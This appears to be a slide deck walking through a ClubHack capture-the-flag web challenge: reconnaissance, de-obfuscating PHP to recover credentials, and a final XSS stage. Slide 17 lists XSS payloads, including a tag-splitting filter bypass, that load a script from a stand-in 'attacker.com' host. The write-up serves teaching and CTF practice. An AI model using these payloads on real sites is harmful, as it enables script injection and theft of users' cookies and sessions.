  • 7. Stage - 1  Information Gathering  Download.html  Can be used to download files from server  Two params: filename & some HASH  How imp the hash is in file download ?  What type of Hash it is?  How to generate it?  UserLogin.html  Auth Bypass  Guessable Logins  What else ???
  • 8. Stage - 1  Analysis  Download.html  Need hash to download file  Hash is SHA1  How to generate it?  UserLogin.html  No SQLi  No Auth Bypass  No Guessable Login  Brute Force ???
  • 9. Stage - 2  Deep Inspection  Found „execute.php‟ in source of download.html   Looks like command utility  OS commanding ???  Analysis  No OS command execution  “Wonly one command”  Commands which takes „file‟ as parameter ???  Single Command  sha1sum
  • 10. Stage - 3  Something to work on  Hash generation – execute.php  File Download – download.php  Login – UserLogin.php  Try to download files  Download.php  Execute.php  UserLogin.php  Analysis  Only „UserLogin.php‟ is possible to download
  • 11. Stage - 4  Obfuscated PHP Code  UserLogin.php is obfuscated  “Free Online PHP Obfuscator v1.2: http://www.fopo.com.a r”  No Online de-obfuscation tool available   I was not able to find out one  Analysis  Go Manual Mode !!  Create scripts
  • 12. Stage - 5  De-Obfuscation  Replace eval() with echo() -  Base64_decode()  Decode $variable names  Replace $variables -  ROT13 -> Base64_decode() -> gzinflate()  Just echo  -
  • 13. Stage - 5  Analysis  Credentials -> „myhashesarenothere.txt‟  Successful Login -> Final.php  Next  Access „myhashesarenothere.txt‟  Login in UserLogin.php
  • 14. Stage – 6: Final  Information Gathering  POST form  Looks like mail client  Hard-coded email addresses & Subject  Message is the only available space for User Input  Analysis  Tamper „TO‟ email address & „Subject‟  Test „Message‟ for SQLi, Code Injection, ….  What else ???
  • 15. Stage – 6: Final  Damn…It‟s a ROCK !!!!  No server-side bug  Code Injection  SQLi  Only XSS  No <script> & <img>  May be flag.txt  May be messages.txt || mail.txt || sec*.txt  ?????  ?????
  • 16. Stage – 6: Final  A Ray of Hope  Tweet from @ClubHack  Only “XSS”  Never seen XSS in CTF  What to exploit?  Myself??  Event Handlers  document.cookie  Did they mean “Some Cookie” ?
  • 17. Final  After 2-days  Got Flag & Submit link   Free entry to ClubHack -> Secured !!  Payloads Used:  <ScRiPt src=“http://attacker.com/evil.js”></script>  me  <scr<script>ipt src=“http://attacker.com/evil.js”></script>  Vishal Oza
  • 18. Thanks/Questions  webDEViL  CTF Creation and Access for “Live Demo”  ClubHack  Organizing CTF challenge  For Gifts !!! http://twitter.com/amolnaik4